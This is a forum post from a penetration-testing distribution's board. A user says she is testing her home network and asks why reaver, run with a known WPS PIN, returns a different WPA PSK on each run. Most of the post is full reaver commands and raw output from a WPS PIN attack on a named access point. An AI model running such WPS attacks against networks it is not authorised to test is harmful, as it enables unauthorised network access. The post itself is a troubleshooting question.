wifite.py + reaver to retrieve WPA2 pass phrase

**hannah** · 05-22-2012, 05:41 PM

I am running these tools against my home network.

I am running first wifite.py (http://www.backtrack-linux.org/forum...ad.php?t=48161) and then reaver.
I know wifite.py is very capable of cracking WPS enabled APs. However this time it cracked the correct WPS pin but not the passphrase. Hence I run reaver to crack the passphrase. I ran it 4 times and everytime it retrieved 4 different passphrase and none of them are correct. Please see the detailed output as below.

Would be keen to know the reason for this please.

Regards

Code:

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: 'aa0a90d4868af15113e51e818e437a6726f75efc7c38d1c9947f26377324f389'
[+] AP SSID: 'Security'
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 26 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '3b3c94285738ab32c88274bebbc7fc9641c2ed123ada4e55dca897ca57ce8e05'
[+] AP SSID: 'Security'
You have new mail in /var/mail/root
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 30 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '6437b12e41d82c03f53f23993b79a03b728dbc4dffae116ade802cb3a941e6ec'
[+] AP SSID: 'Security'
You have new mail in /var/mail/root
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 13 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '9402de2456f497009bd2725123dd97c05b9a947373187893eb41790024185283'
[+] AP SSID: 'Security'
[+] Nothing done, nothing to save.
root@bt:~#

BackTrack Linux - Penetration Testing Distribution

Thread: wifite.py + reaver to retrieve WPA2 pass phrase

Thread Tools

Search Thread

Display

Threaded View

wifite.py + reaver to retrieve WPA2 pass phrase

Similar Threads

wifite v2 beta

Cannot retrieve minimized applications

Is it possible to retrieve a specific page from Akamai's cache?

Wifite installed from repos

WPA2 pass

Tags for this Thread

Posting Permissions